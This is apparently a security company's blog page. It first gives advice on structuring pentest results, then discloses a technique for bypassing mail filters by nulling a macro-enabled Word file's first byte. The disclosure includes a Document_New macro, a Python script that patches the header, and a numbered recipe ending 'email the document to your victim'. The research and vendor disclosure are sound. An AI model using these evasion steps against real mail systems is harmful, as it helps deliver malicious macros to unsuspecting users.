The pentesting company’s report may also include custom information. While this documents the vendor’s work and shows they did more than a scan, it presents problems for streamlining that data into an orchestrated process – especially if the information must be enriched before sending it to the remediation resources. For instance, the remediation recommendations or the described business impact may not align with your corporate policy. You may disagree with their severity assessment, for example, because you have more knowledge of the asset’s importance or mitigating factors in your environment.

Three Best Practices for Pentest Data Compatibility

Receiving formatted, structured pentest results from a penetration testing company allows you to streamline your vulnerability orchestration process and track the findings through to remediation. The following three best practices can help align the pentest data with your organization’s process.

Provide a template for your expected data format. The data format for the pentest findings must be predefined for your vulnerability orchestration and automation to work properly. You know your format, but the pentesting company doesn’t. Share your format prior to engaging the vendor to ensure they will accommodate your requirements. The best pentesting company will be able to deliver the results in a structured format that’s customized for you.
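
As a purely hypothetical illustration, such a template might be a simple JSON record per finding; the exact fields will depend on your orchestration tooling:

{
  "finding_id": "",
  "vulnerability_name": "",
  "rubric_id": "",
  "severity": "",
  "affected_asset": "",
  "description": "",
  "remediation": "",
  "retest_status": ""
}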

Provide a reference rubric with IDs for your common vulnerability types. Consider your normalization requirements for vulnerability definitions. If you’ve standardized the common ones, provide a reference rubric so the vendor can tag each finding with the ID of an existing definition, letting you correlate the test results directly with your known vulnerability types. Once you’ve put the formatted, structured pentest results into your orchestration process, you can track them through to remediation.

Provide a retest template. When submitting a retest request, ensure that the vendor’s output matches an expected format so you can automate the data marking for closing the vulnerabilities that have been verified. This might be the same format you started with, or it might be a simpler retest template for the vendor to fill out.

These three best practices can help you ensure the pentesting data is compatible with your vulnerability orchestration process.

Next Steps

Read the earlier posts in this series:

An Approach to Bypassing Mail Filters

TLDR

By “nulling” the first one or two bytes of a docm file, an attacker can get a malicious document past some spam filters even when the file type is explicitly blocked. Upon opening the docm file, Microsoft Word gives the option to repair the document, which allows for the potential execution of a macro embedded in the document.

A number of vendors have independently verified this bypass as an issue, so naturally it’s time to write a blog post. While macro-enabled documents were the focus of our testing, the same methodology could apply to many other file types and applications.

Background

Suppose an email filter is configured to block macro-enabled Word documents (docm). How does that filter decide whether a particular sample is a “docm” file in order to support a filtering decision?

Generally, we believe this occurs in two main ways, which are not always used in tandem and are not mutually exclusive:

  1. Extension: The user-friendly way to mark files, this is no more than a string appended to the end of a file name. Simply put, extensions provide a nice way to keep track of file types and are generally used as a shortcut by the operating system to improve user experience. Windows will use a file extension to look up file registration info in the registry, allowing Windows to pass execution to the correct program with the file as an (optional) argument.
  2. Header: Files can be further recognized by a particular file header, as a result of the file format. Most file types have a well-defined structure, and the first 2-24 bytes, commonly referred to as “Magic Bytes”, usually provide a good indication of a file’s contents. For anyone curious, you can find a good list of these at https://www.garykessler.net/library/file_sigs.html. Some quick examples:
    1. MZ (4d 5a) for PE files (exe, dll, sys)
    2. PK (50 4b) for zip files (zip, docm)
  3. Contents (bonus): With the use of more exhaustive parsing, a file could be identified based on its holistic structure matching a known format. Naturally this is rare in filtering mechanisms due to the computational cost of parsing.
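
For example, a filter’s header check can be as simple as the following Python sketch – which is also exactly the kind of check that nulling the first byte defeats:

MAGIC = {
    b"\x4d\x5a": "PE executable (exe, dll, sys)",    # 'MZ'
    b"\x50\x4b": "zip container (zip, docm, docx)",  # 'PK'
}

def sniff(path):
    with open(path, "rb") as f:
        head = f.read(2)
    # a nulled first byte (e.g. b"\x00K") matches nothing and falls through
    return MAGIC.get(head, "unknown")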

In regards to bypassing a mail filter, consider the following:

  • A malicious file is created which would normally match an explicit block rule.
  • The contents of the file header is tampered with to bypass “in-transit” filtering.
  • A file extension is chosen to direct execution to a specific application.
  • The file is still considered “valid” by the application and executed (semi-)normally.

Testing Parameters

As mentioned above, we were specifically interested in the filtering mechanisms for “Macro-Enabled Word Documents” or DOCM files.

Payload: PlanetExpress.docm, an OpenXML (Office 07+) formatted document with the following embedded macro.

Sub Document_Open()
    MsgBox "Hello!"
End Sub

Delivery Technique: PlanetExpress.docm directly attached to an e-mail that is delivered to Outlook.

Defense: A mail product configured to block all macro-enabled files but allow any traditional documents. Each mail filtering product has a different process for handling incoming documents. For example, with the first product we tested, all documents were inspected by the filter regardless of the blocking rules in place. Each document was opened, parsed, and inspected. If the document was deemed safe, a link to the document would be sent to the user rather than the document itself.

The Classic Phish

For our first test we simply changed the file extension from .docm to .doc. This is a common technique – probably the “original” technique – for hiding the fact that a document with a macro is being sent in. It can fool users but not a modern mail filter; as expected, this file was blocked every time.

Testing the Extension (Attempt #1)

For our first real attempt at bypassing the filter, we removed the extension completely. To our surprise, the mail filter allowed the document through unopened, unparsed, and uninspected. However, if the user attempted to open the PlanetExpress file, Windows would present a prompt asking which application should be used to handle the file.

Testing the Extension and the File Header (Attempt #2)

For our next attempt, we changed the file extension from .docm to .doc and nulled the first byte of the file header.

Again, to our surprise this got past the filter and was delivered to the user’s inbox (unopened, unparsed, and uninspected). However, when the user opened the document, Word brought up the ‘File Conversion’ dialog box.

Putting the Pieces Together (Attempt #3)

We knew from the previous test that we could use any extension, so long as the first byte or two were nulled out. The challenge then became to find something a Windows program could execute, despite being a corrupt file. In our final test, we kept the original docm extension and nulled the first byte of the file header. The email was again delivered, but interestingly enough, Word handled the corruption differently:

  1. When the corruption is detected, it apologizes for not being able to open the document.
  2. Clicking ‘OK’, we get an option to repair the file.
  3. Clicking ‘Yes’, we get a brand new file called ‘Document1’.

However, when we click ‘Enable Content’, we don’t get the message box from our macro. Why? Well, it’s because Word has created a new “Document1” and our old macro, while still there, won’t be executed until the next time we open the file. This is not very useful from an attack standpoint, but a simple change will get us execution. Change the macro to:

Sub Document_New()
    MsgBox "Hello!"
End Sub

Now when we click through the prompts and enable macros, we are warmly greeted by some macro execution.

Conclusion

This was a relatively simple attack that came from questioning our assumptions about mail filters. While the added user prompts and the requirement for a docm extension are not ideal, this does represent an interesting proof of concept that has successfully bypassed mail filtering in the real world. A number of other scenarios involving extensions, original formats, and header tampering have since been attempted, but we feel the attempts above concisely convey the general process.

Here are the steps for the working attack:

  1. Create a macro-enabled Word document
  2. Add a Document_New macro as above and save the document
  3. Open the document in a hex editor and null out the first byte, then re-save the file (the short script below automates this)
  4. Email the document to your victim and wait patiently for profit
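
Step 3 can be scripted in a few lines of Python rather than done by hand in a hex editor:

# null the first magic byte ('P' of the 'PK' zip header) of the payload
data = bytearray(open("PlanetExpress.docm", "rb").read())
data[0] = 0x00
open("PlanetExpress.docm", "wb").write(data)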

Vendor Response

  • Mimecast: Fixed (2017)
  • Barracuda: Fixed (2018)
  • Microsoft: Non-issue citing “user action required” (2017)
